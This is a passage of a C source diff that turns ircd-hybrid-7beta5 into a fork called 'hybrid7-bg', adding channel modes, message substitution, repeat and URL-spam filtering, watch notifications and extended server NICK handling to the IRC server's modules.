diff -uNrd ircd-hybrid-7beta5/modules/m_message.c hybrid7-bg/modules/m_message.c
--- ircd-hybrid-7beta5/modules/m_message.c	Wed May  2 03:17:03 2001
+++ hybrid7-bg/modules/m_message.c	Wed Sep 18 19:19:46 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_message.c,v 1.66 2001/05/02 07:17:03 a1kmm Exp $
+ *   $Id: m_message.c,v 1.20 2002/09/17 15:25:33 Administrator Exp $
  */
 #include "handlers.h"
 #include "client.h"
@@ -41,6 +41,7 @@
 #include "class.h"
 #include "msg.h"
 #include "packet.h"
+#include "list.h"
 
 #include <string.h>
 
@@ -100,6 +101,9 @@
 
 static void free_target_table(void);
 
+static void replace(char *, char *, char *, int);
+static int check_repeat(struct Client *, struct Channel *, char *);
+
 struct Message privmsg_msgtab = {
   "PRIVMSG", 0, 1, 0, MFLG_SLOW | MFLG_UNREG, 0L,
   {m_unregistered, m_privmsg, m_privmsg, m_privmsg}
@@ -175,6 +179,12 @@
                      int parc,
                      char *parv[])
 {
+  char equiv[NICKLEN + 1];
+
+  if (parc > 1)
+    if (parv[1][0] && get_equiv_nick(parv[1], equiv))
+      parv[1] = equiv;
+
   m_message(PRIVMSG,"PRIVMSG",client_p,source_p,parc,parv);
 }
 
@@ -183,6 +193,12 @@
                     int parc,
                     char *parv[])
 {
+  char equiv[NICKLEN + 1];
+
+  if (parc > 1)
+    if (parv[1][0] && get_equiv_nick(parv[1], equiv))
+      parv[1] = equiv;
+
   m_message(NOTICE,"NOTICE",client_p,source_p,parc,parv);
 }
 
@@ -544,11 +560,60 @@
   /* chanops and voiced can flood their own channel with impunity */
   if( (result = can_send(vchan,source_p)) )
     {
+      if (result == CAN_SEND_NOTREG)
+	{
+	  if (p_or_n != NOTICE)
+	    sendto_one(source_p, form_str(ERR_CANNOTSENDNOTREG),
+		       me.name, source_p->name, chname);
+	  return;
+	}
       if (result == CAN_SEND_OPV || 
           !flood_attack_channel(p_or_n, source_p, vchan, chname))
 	{
-          sendto_channel_butone(client_p, source_p, vchan,
-                                command, ":%s", text);
+		dlink_node *ptr;
+		struct Ban *banptr;
+		char strbuf[BUFSIZE+1], buf[TOPICLEN+1];
+		char *word, *subst, *p = buf;
+
+		if (MyClient(source_p) && IsPerson(source_p))
+		if (!is_chan_op(vchan, source_p) && NoRepeatChannel(vchan))
+		if (check_repeat(source_p, vchan, text)) {
+
+			sendto_one(source_p, form_str(ERR_NOREPEATING),
+				me.name, source_p->name, chname);
+			return;
+		}
+
+	  if (NoColorChannel(vchan)) 
+	    /*strip_color(text);*/
+	    text = strip_color(text, 0);
+
+	  strncpy_irc(strbuf, text, BUFSIZE)[BUFSIZE] = 0;
+
+	  if (MyClient(source_p) && IsPerson(source_p))
+	  if (!is_chan_op(vchan, source_p))
+	  for (ptr = vchan->substlist.head; ptr; ptr = ptr->next, p = buf) {
+
+		  banptr = ptr->data; 
+		  strncpy_irc(buf, banptr->banstr, TOPICLEN)[TOPICLEN] = 0;
+
+		  while (*p) 
+			  if (*p++ == '$')
+				  *(p-1) = ' ';
+
+		  subst = strchr(buf, '/'); if (subst) {
+
+			  *subst++ = 0; word = buf;
+			  replace(strbuf, word, subst, BUFSIZE);
+			  strbuf[BUFSIZE] = 0;
+		  }
+	  }
+
+	  if (PaceChannel(vchan) && (vchan->msgs < MAX_PACEMSG))
+	    add_pace_msg(vchan, client_p, source_p, command, strbuf);
+	  else
+            sendto_channel_butone(client_p, source_p, vchan,
+                                command, ":%s", strbuf);
 	}
     }
   else
@@ -616,6 +681,10 @@
 	source_p->user->last = CurrentTime;
     }
 
+  if (NoColorChannel(vchan)) 
+    /*strip_color(text);*/
+    text = strip_color(text, 0);
+
   sendto_channel_local(type,
 		       chptr,
 		       ":%s!%s@%s %s %c%s :%s",
@@ -668,6 +737,24 @@
 
   if(MyClient(target_p))
     {
+      if (IsSetRegAccept(target_p) && !(source_p->svsflags & FLAGS_SVS_IDENT))
+	{
+	  if (p_or_n != NOTICE)
+	    sendto_one(source_p, form_str(ERR_REGACCEPTONLY),
+		       me.name, source_p->name, target_p->name);
+	    return;
+	}
+
+	  if (ConfigFileEntry.spam_wait && (p_or_n != NOTICE) &&
+		((target_p->localClient->last_join_time + ConfigFileEntry.spam_wait > CurrentTime) ||
+		 (target_p->localClient->last_leave_time + ConfigFileEntry.spam_wait > CurrentTime)))
+	  {
+		sendto_anywhere(source_p, target_p, 
+			"NOTICE %s :*** I'm joining/leaving a chan, please try again in a few seconds.",
+			source_p->name);
+		return;
+	  }
+
       if(!IsServer(source_p) && IsSetCallerId(target_p))
 	{
 	  /* Here is the anti-flood bot/spambot code -db */
@@ -677,7 +764,7 @@
 			 source_p->name,
 			 source_p->username,
 			 source_p->host,
-			 command, target_p->name, text);
+			 command, target_p->name, translate(target_p, text));
 	    }
 	  else
 	    {
@@ -716,7 +803,7 @@
            * (to avoid flood warnings), lastly if theyre our client and flooding    -- fl */
           if(!MyClient(source_p) || IsOper(source_p) || (MyClient(source_p) && !flood_attack_client(p_or_n,source_p,target_p)))
 	    sendto_anywhere(target_p, source_p, "%s %s :%s",
-			    command, target_p->name, text);
+			    command, target_p->name, translate(target_p, text));
 	}
     }
   else
@@ -957,3 +1044,59 @@
 	}
     }
 }
+
+static void replace(char *buf, char *word, char *subst, int size)
+{
+	char *p = buf;
+	int len1 = strlen(word), len2 = strlen(subst);
+
+	while (*p)
+		if (!ircncmp(p, word, len1)) {
+
+			if (p + len2 + strlen(p + len1) > buf + size)
+				return;
+
+			memmove(p + len2, p + len1, strlen(p + len1) + 1);
+			memmove(p, subst, len2);
+			p += len2;
+		}
+		else
+			p++;
+}
+
+static int check_repeat(struct Client *source_p,
+						struct Channel *chptr,
+						char *text)
+{
+	dlink_node *ptr;
+	struct Repeat *repeatptr;
+
+	for (ptr = source_p->user->repeat.head; ptr; ptr = ptr->next) {
+
+		repeatptr = ptr->data;
+		if (repeatptr->chptr == chptr)
+			if (!strcmp(repeatptr->text, text)) {
+
+				return 1;
+
+			} else {
+
+				MyFree(repeatptr->text);
+				DupString(repeatptr->text, text);
+				repeatptr->lastphrase = CurrentTime;
+
+				return 0;
+			}
+	}
+
+	repeatptr = (struct Repeat *)MyMalloc(sizeof(struct Repeat));
+	repeatptr->chptr = chptr;
+	DupString(repeatptr->text, text);
+	repeatptr->lastphrase = CurrentTime;
+
+	ptr = make_dlink_node();
+	dlinkAdd(repeatptr, ptr, &source_p->user->repeat);
+
+	return 0;
+}
+
diff -uNrd ircd-hybrid-7beta5/modules/m_mode.c hybrid7-bg/modules/m_mode.c
--- ircd-hybrid-7beta5/modules/m_mode.c	Wed May  2 03:17:04 2001
+++ hybrid7-bg/modules/m_mode.c	Sun Jun  9 11:15:47 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_mode.c,v 1.38 2001/05/02 07:17:04 a1kmm Exp $
+ *   $Id: m_mode.c,v 1.3 2002/06/09 15:15:47 Administrator Exp $
  */
 #include "tools.h"
 #include "handlers.h"
@@ -77,6 +77,13 @@
   static char     modebuf[MODEBUFLEN];
   static char     parabuf[MODEBUFLEN];
   int n = 2;
+
+/*  if (client_p->user)
+	  client_p->user->known = 1;
+
+  this marks drones as known clients...
+
+	  */
 
   /* Now, try to find the channel in question */
   if( !IsChanPrefix(parv[1][0]) )
diff -uNrd ircd-hybrid-7beta5/modules/m_motd.c hybrid7-bg/modules/m_motd.c
--- ircd-hybrid-7beta5/modules/m_motd.c	Mon Apr  9 08:41:50 2001
+++ hybrid7-bg/modules/m_motd.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_motd.c,v 1.18 2001/04/09 12:41:50 fl_ Exp $
+ *   $Id: m_motd.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "client.h"
 #include "tools.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_names.c hybrid7-bg/modules/m_names.c
--- ircd-hybrid-7beta5/modules/m_names.c	Mon May 14 06:08:57 2001
+++ hybrid7-bg/modules/m_names.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_names.c,v 1.32 2001/05/14 10:08:57 toot Exp $
+ *   $Id: m_names.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "tools.h"
 #include "handlers.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_nburst.c hybrid7-bg/modules/m_nburst.c
--- ircd-hybrid-7beta5/modules/m_nburst.c	Wed Apr  4 11:22:31 2001
+++ hybrid7-bg/modules/m_nburst.c	Tue Jun  5 12:35:45 2001
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: m_nburst.c,v 1.10 2001/04/04 15:22:31 androsyn Exp $
+ * $Id: m_nburst.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "tools.h"
 #include "channel.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_nick.c hybrid7-bg/modules/m_nick.c
--- ircd-hybrid-7beta5/modules/m_nick.c	Wed Apr  4 11:22:31 2001
+++ hybrid7-bg/modules/m_nick.c	Wed Sep 18 19:19:46 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_nick.c,v 1.60 2001/04/04 15:22:31 androsyn Exp $
+ *   $Id: m_nick.c,v 1.10 2002/09/18 21:36:12 Administrator Exp $
  */
 #include "handlers.h"
 #include "client.h"
@@ -321,7 +321,9 @@
 **      parv[5] = username
 **      parv[6] = hostname
 **      parv[7] = server
-**      parv[8] = ircname
+**      parv[8] = real hostname (when CAP_HOSTMASK-able)
+**      parv[9] = IP (when CAP_IP-able)
+**      parv[10] = ircname
 */
 static void ms_nick(struct Client *client_p, struct Client *source_p,
                    int parc, char *parv[])
@@ -344,7 +346,7 @@
    * parc == 9 on a normal TS style server-to-server NICK
    *      introduction
    */
-  if( (parc != 3) && (parc != 9) )
+  if( (parc != 3) && (parc != 9) && (parc != 10) && (parc != 11))
     return;
 
   /*
@@ -417,12 +419,19 @@
                 parv[0], parv[1]);
      parv[6][HOSTLEN] = 0;
     }
+  /* Okay, we should be safe to cut off the real hostname... -demond */
+  if (parc > 9 && strlen(parv[8]) > HOSTLEN)
+    {
+     sendto_realops_flags(FLAGS_ALL, "Long real host from server %s for %s",
+                parv[0], parv[1]);
+     parv[8][HOSTLEN] = 0;
+    }
   /* Okay, we should be safe to cut off the realname... -A1kmm */
-  if (parc > 8 && strlen(parv[8]) > REALLEN)
+  if (parc > 8 && strlen((parc > 9)? ((parc > 10)? parv[10] : parv[9]) : parv[8]) > REALLEN)
     {
      sendto_realops_flags(FLAGS_ALL, "Long realname from server %s for %s",
                 parv[0], parv[1]);
-     parv[8][REALLEN] = 0;
+     parv[(parc > 9)? ((parc > 10)? 10 : 9) : 8][REALLEN] = 0;
     }
   if (!IsServer(source_p) && parc > 2)
     newts = atol(parv[2]);
@@ -479,7 +488,7 @@
       {
         if (fromTS && !(target_p->user))
           {
-            sendto_realops_flags(FLAGS_ALL,
+            sendto_realops_flags(FLAGS_SKILL,
                    "Nick Collision on %s(%s(NOUSER) <- %s!%s@%s)(TS:%s)",
                    target_p->name, target_p->from->name, parv[1], parv[5], parv[6],
                    client_p->name);
@@ -554,7 +563,7 @@
       if (!newts || !target_p->tsinfo
           || (newts == target_p->tsinfo))
         {
-          sendto_realops_flags(FLAGS_ALL,
+          sendto_realops_flags(FLAGS_SKILL,
 			       "Nick collision on %s(%s <- %s)(both killed)",
 			       target_p->name, target_p->from->name,
 			       get_client_name(client_p, HIDE_IP));
@@ -604,12 +613,12 @@
           else
             {
               if (sameuser)
-                sendto_realops_flags(FLAGS_ALL,
+                sendto_realops_flags(FLAGS_SKILL,
                        "Nick collision on %s(%s <- %s)(older killed)",
 		       target_p->name, target_p->from->name,
 		       get_client_name(client_p, HIDE_IP));
               else
-                sendto_realops_flags(FLAGS_ALL,
+                sendto_realops_flags(FLAGS_SKILL,
 			     "Nick collision on %s(%s <- %s)(newer killed)",
 			     target_p->name, target_p->from->name,
 			     get_client_name(client_p, HIDE_IP));
@@ -654,7 +663,7 @@
   if ( !newts || !target_p->tsinfo || (newts == target_p->tsinfo) ||
       !source_p->user)
     {
-      sendto_realops_flags(FLAGS_ALL,
+      sendto_realops_flags(FLAGS_SKILL,
 	   "Nick change collision from %s to %s(%s <- %s)(both killed)",
            source_p->name, target_p->name, target_p->from->name,
 	   get_client_name(client_p, HIDE_IP));
@@ -715,12 +724,12 @@
           (!sameuser && newts > target_p->tsinfo))
         {
           if (sameuser)
-            sendto_realops_flags(FLAGS_ALL,
+            sendto_realops_flags(FLAGS_SKILL,
                  "Nick change collision from %s to %s(%s <- %s)(older killed)",
                  source_p->name, target_p->name, target_p->from->name,
                  get_client_name(client_p, HIDE_IP));
           else
-            sendto_realops_flags(FLAGS_ALL,
+            sendto_realops_flags(FLAGS_SKILL,
                  "Nick change collision from %s to %s(%s <- %s)(newer killed)",
                  source_p->name, target_p->name, target_p->from->name,
                  get_client_name(client_p, HIDE_IP));
@@ -756,12 +765,12 @@
       else
         {
           if (sameuser)
-            sendto_realops_flags(FLAGS_ALL,
+            sendto_realops_flags(FLAGS_SKILL,
                                "Nick collision on %s(%s <- %s)(older killed)",
                                target_p->name, target_p->from->name,
                                get_client_name(client_p, HIDE_IP));
           else
-            sendto_realops_flags(FLAGS_ALL,
+            sendto_realops_flags(FLAGS_SKILL,
                          "Nick collision on %s(%s <- %s)(newer killed)",
                          target_p->name, target_p->from->name,
                          get_client_name(client_p, HIDE_IP));
@@ -810,6 +819,8 @@
 nick_from_server(struct Client *client_p, struct Client *source_p, int parc,
                  char *parv[], time_t newts,char *nick)
 {
+	int samenick = 0;
+
   if (IsServer(source_p))
     {
       /* A server introducing a new client, change source */
@@ -822,7 +833,17 @@
         add_lazylinkclient(client_p, source_p);
           
       if (parc > 2)
-        source_p->hopcount = atoi(parv[2]);
+	{
+          if (IsCapable(client_p, CAP_SVS))
+            {
+              unsigned int val = atoi(parv[2]);
+
+              source_p->svsflags = val >> 8;
+              source_p->hopcount = val & 0xFF;       
+            } 
+          else source_p->hopcount = atoi(parv[2]);
+	}
+
       if (newts)
         source_p->tsinfo = newts;
       else
@@ -858,7 +879,8 @@
             }
 
           return do_remote_user(nick, client_p, source_p, parv[5], parv[6],
-				parv[7], parv[8], NULL);
+			  parv[7], (parc > 9)? ((parc > 10)? parv[10] : parv[9]) : parv[8], 
+				(parc > 9)? parv[8] : NULL, (parc > 10)? parv[9] : NULL, NULL);
         }
     }
   else if (source_p->name[0])
@@ -885,16 +907,28 @@
   /*
   **  Finally set new nick name.
   */
-  if (source_p->name[0])
+  if (source_p->name[0]) {
+
     del_from_client_hash_table(source_p->name, source_p);
+
+	samenick = irccmp(source_p->name, nick) ? 0 : 1;
+	if (/*IsPerson(source_p) &&*/ !samenick)
+	  hash_check_watch(source_p, RPL_LOGOFF);
+  }
+
   strcpy(source_p->name, nick);
   add_to_client_hash_table(nick, source_p);
 
+  if (/*IsPerson(source_p) &&*/ !samenick)
+	hash_check_watch(source_p, RPL_LOGON);
+
   /* Make sure everyone that has this client on its accept list
    * loses that reference. 
    */
 
   del_all_accepts(source_p);
+
+  source_p->svsflags &= ~FLAGS_SVS_IDENT;
   return 0;
 }
 
diff -uNrd ircd-hybrid-7beta5/modules/m_oper.c hybrid7-bg/modules/m_oper.c
--- ircd-hybrid-7beta5/modules/m_oper.c	Mon May  7 11:50:30 2001
+++ hybrid7-bg/modules/m_oper.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_oper.c,v 1.32 2001/05/07 15:50:30 toot Exp $
+ *   $Id: m_oper.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "tools.h"
 #include "handlers.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_operwall.c hybrid7-bg/modules/m_operwall.c
--- ircd-hybrid-7beta5/modules/m_operwall.c	Wed Apr  4 11:22:32 2001
+++ hybrid7-bg/modules/m_operwall.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_operwall.c,v 1.22 2001/04/04 15:22:32 androsyn Exp $
+ *   $Id: m_operwall.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_part.c hybrid7-bg/modules/m_part.c
--- ircd-hybrid-7beta5/modules/m_part.c	Fri May  4 18:24:00 2001
+++ hybrid7-bg/modules/m_part.c	Wed Sep 18 19:19:46 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_part.c,v 1.44 2001/05/04 22:24:00 fl_ Exp $
+ *   $Id: m_part.c,v 1.7 2002/09/17 17:37:14 Administrator Exp $
  */
 #include "tools.h"
 #include "handlers.h"
@@ -173,22 +173,34 @@
       (source_p->firsttime + ConfigFileEntry.anti_spam_exit_message_time)
       < CurrentTime))))
     {
+      /*strip_color(reason);*/
+      reason = strip_color(reason, 1);
+
+	  if (match("*http://*", reason) || match("*www*", reason))
+		reason = "<URL spam removed>";
+
       sendto_channel_remote_prefix(chptr, client_p, source_p, "PART %s :%s",
-                              chptr->chname,
-                              reason);
-      sendto_channel_local(ALL_MEMBERS,
+				   chptr->chname,
+				   reason);
+      if (PaceChannel(chptr) && (chptr->parts < MAX_PACEJOIN))
+	add_pace(chptr, source_p, bchan->chname, 0, 0);
+      else
+        sendto_channel_local(ALL_MEMBERS,
                            chptr, ":%s!%s@%s PART %s :%s",
                            source_p->name,
                            source_p->username,
                            source_p->host,
                            bchan->chname,
-                           reason);
+			   reason);
     }
   else
     {
       sendto_channel_remote_prefix(chptr, client_p, source_p, "PART %s",
                                    chptr->chname);
-      sendto_channel_local(ALL_MEMBERS,
+      if (PaceChannel(chptr) && (chptr->parts < MAX_PACEJOIN))
+	add_pace(chptr, source_p, bchan->chname, 0, 0);
+      else
+        sendto_channel_local(ALL_MEMBERS,
                            chptr, ":%s!%s@%s PART %s",
                            source_p->name,
                            source_p->username,
@@ -196,4 +208,7 @@
                            bchan->chname);
     }
   remove_user_from_channel(chptr, source_p, 0);
+
+  if (MyConnect(source_p))
+	source_p->localClient->last_leave_time = CurrentTime;
 }
diff -uNrd ircd-hybrid-7beta5/modules/m_pass.c hybrid7-bg/modules/m_pass.c
--- ircd-hybrid-7beta5/modules/m_pass.c	Wed Apr  4 11:22:33 2001
+++ hybrid7-bg/modules/m_pass.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *  $Id: m_pass.c,v 1.16 2001/04/04 15:22:33 androsyn Exp $
+ *  $Id: m_pass.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"  /* m_pass prototype */
 #include "client.h"      /* client struct */
diff -uNrd ircd-hybrid-7beta5/modules/m_ping.c hybrid7-bg/modules/m_ping.c
--- ircd-hybrid-7beta5/modules/m_ping.c	Mon Apr  9 05:02:52 2001
+++ hybrid7-bg/modules/m_ping.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_ping.c,v 1.18 2001/04/09 09:02:52 a1kmm Exp $
+ *   $Id: m_ping.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_pong.c hybrid7-bg/modules/m_pong.c
--- ircd-hybrid-7beta5/modules/m_pong.c	Wed Apr  4 11:22:33 2001
+++ hybrid7-bg/modules/m_pong.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_pong.c,v 1.14 2001/04/04 15:22:33 androsyn Exp $
+ *   $Id: m_pong.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_post.c hybrid7-bg/modules/m_post.c
--- ircd-hybrid-7beta5/modules/m_post.c	Wed Apr  4 11:22:33 2001
+++ hybrid7-bg/modules/m_post.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_post.c,v 1.2 2001/04/04 15:22:33 androsyn Exp $
+ *   $Id: m_post.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_quit.c hybrid7-bg/modules/m_quit.c
--- ircd-hybrid-7beta5/modules/m_quit.c	Wed Apr  4 11:22:34 2001
+++ hybrid7-bg/modules/m_quit.c	Sun Jun  9 11:16:26 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_quit.c,v 1.18 2001/04/04 15:22:34 androsyn Exp $
+ *   $Id: m_quit.c,v 1.6 2002/06/09 15:16:26 Administrator Exp $
  */
 #include "handlers.h"
 #include "client.h"
@@ -73,6 +73,9 @@
   if (strlen(comment) > (size_t) TOPICLEN)
     comment[TOPICLEN] = '\0';
 
+  if (match("*http://*", comment) || match("*www*", comment))
+	  comment = "<URL spam removed>";
+
   if (ConfigFileEntry.client_exit && comment[0])
     {
       snprintf(reason, TOPICLEN, "Client Exit: %s", comment);
@@ -86,6 +89,10 @@
       comment = "Client Quit";
     }
 
+  if (parc > 1)
+    /*strip_color(comment);*/
+    comment = strip_color(comment, 1);
+
   exit_client(client_p, source_p, source_p, comment);
 }
 
@@ -104,6 +111,10 @@
   source_p->flags |= FLAGS_NORMALEX;
   if (strlen(comment) > (size_t) TOPICLEN)
     comment[TOPICLEN] = '\0';
+
+  if (parc > 1)
+    /*strip_color(comment);*/
+    comment = strip_color(comment, 1);
 
   exit_client(client_p, source_p, source_p, comment);
 }
diff -uNrd ircd-hybrid-7beta5/modules/m_rehash.c hybrid7-bg/modules/m_rehash.c
--- ircd-hybrid-7beta5/modules/m_rehash.c	Wed Apr  4 11:22:34 2001
+++ hybrid7-bg/modules/m_rehash.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_rehash.c,v 1.23 2001/04/04 15:22:34 androsyn Exp $
+ *   $Id: m_rehash.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_restart.c hybrid7-bg/modules/m_restart.c
--- ircd-hybrid-7beta5/modules/m_restart.c	Wed Apr  4 11:22:34 2001
+++ hybrid7-bg/modules/m_restart.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_restart.c,v 1.15 2001/04/04 15:22:34 androsyn Exp $
+ *   $Id: m_restart.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_server.c hybrid7-bg/modules/m_server.c
--- ircd-hybrid-7beta5/modules/m_server.c	Fri Apr 13 18:39:46 2001
+++ hybrid7-bg/modules/m_server.c	Sun Feb 17 00:30:57 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_server.c,v 1.56 2001/04/13 22:39:46 davidt Exp $
+ *   $Id: m_server.c,v 1.2 2002/02/17 05:30:57 demond Exp $
  */
 #include "tools.h"
 #include "handlers.h"  /* m_server prototype */
@@ -448,7 +448,8 @@
                          
     }
       
-  sendto_realops_flags(FLAGS_EXTERNAL, "Server %s being introduced by %s",
+  if (!IsRelay(target_p))
+    sendto_realops_flags(FLAGS_EXTERNAL, "Server %s being introduced by %s",
 		       target_p->name, source_p->name);
 
   if (!refresh_user_links)
diff -uNrd ircd-hybrid-7beta5/modules/m_set.c hybrid7-bg/modules/m_set.c
--- ircd-hybrid-7beta5/modules/m_set.c	Wed Apr  4 11:22:35 2001
+++ hybrid7-bg/modules/m_set.c	Tue Jun  5 12:35:45 2001
@@ -19,7 +19,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_set.c,v 1.33 2001/04/04 15:22:35 androsyn Exp $ */
+ *   $Id: m_set.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $ */
 
 /* rewritten by jdc */
 
diff -uNrd ircd-hybrid-7beta5/modules/m_sjoin.c hybrid7-bg/modules/m_sjoin.c
--- ircd-hybrid-7beta5/modules/m_sjoin.c	Wed May 16 19:32:06 2001
+++ hybrid7-bg/modules/m_sjoin.c	Thu Jul 11 15:02:08 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_sjoin.c,v 1.88 2001/05/16 23:32:06 leeh Exp $
+ *   $Id: m_sjoin.c,v 1.7 2002/07/11 19:02:08 Administrator Exp $
  */
 #include "tools.h"
 #include "handlers.h"
@@ -171,6 +171,27 @@
       case 'a':
         mode.mode |= MODE_HIDEOPS;
         break;
+      case 'c':
+        mode.mode |= MODE_NOCOLOR;
+        break;
+      case 'r':
+        mode.mode |= MODE_REGCHAN;
+        break;
+      case 'x':
+        mode.mode |= MODE_PACE;
+        break;
+      case 'z':
+        mode.mode |= MODE_NOREPEAT;
+        break;
+      case 'R':
+        mode.mode |= MODE_REGNICKS;
+        break;
+      case 'C':
+        mode.mode |= MODE_CYRNICKS;
+        break;
+      case 'M':
+        mode.mode |= MODE_REGSPEAK;
+        break;
       case 'k':
         strncpy_irc(mode.key, parv[4 + args], KEYLEN);
         args++;
@@ -474,7 +495,11 @@
 	  if( top_chptr )
 	    {
 	      add_vchan_to_client_cache(target_p,top_chptr, chptr);
-	      sendto_channel_local(ALL_MEMBERS,chptr, ":%s!%s@%s JOIN :%s",
+
+              if (PaceChannel(chptr) && (chptr->joins < MAX_PACEJOIN))
+	        add_pace(chptr, target_p, top_chptr->chname, 1, 0);
+	      else
+	        sendto_channel_local(ALL_MEMBERS,chptr, ":%s!%s@%s JOIN :%s",
 				   target_p->name,
 				   target_p->username,
 				   target_p->host,
@@ -482,7 +507,10 @@
 	    }
 	  else
 	    {
-	      sendto_channel_local(ALL_MEMBERS,chptr, ":%s!%s@%s JOIN :%s",
+              if (PaceChannel(chptr) && (chptr->joins < MAX_PACEJOIN))
+	        add_pace(chptr, target_p, parv[2], 1, 0);
+	      else
+	        sendto_channel_local(ALL_MEMBERS,chptr, ":%s!%s@%s JOIN :%s",
 				   target_p->name,
 				   target_p->username,
 				   target_p->host,
@@ -593,6 +621,13 @@
   { MODE_INVITEONLY, 'i' },
   { MODE_PRIVATE,    'p' },
   { MODE_HIDEOPS,    'a' },
+  { MODE_NOCOLOR,    'c' },
+  { MODE_REGCHAN,    'r' },
+  { MODE_PACE,       'x' },
+  { MODE_NOREPEAT,   'z' },
+  { MODE_REGNICKS,   'R' },
+  { MODE_REGSPEAK,   'M' },
+  { MODE_CYRNICKS,   'C' },
   { 0, 0 }
 };
 
diff -uNrd ircd-hybrid-7beta5/modules/m_squit.c hybrid7-bg/modules/m_squit.c
--- ircd-hybrid-7beta5/modules/m_squit.c	Wed Apr  4 11:22:36 2001
+++ hybrid7-bg/modules/m_squit.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_squit.c,v 1.32 2001/04/04 15:22:36 androsyn Exp $
+ *   $Id: m_squit.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_stats.c hybrid7-bg/modules/m_stats.c
--- ircd-hybrid-7beta5/modules/m_stats.c	Sat May  5 17:56:11 2001
+++ hybrid7-bg/modules/m_stats.c	Sat Jun  1 03:35:39 2002
@@ -20,7 +20,7 @@
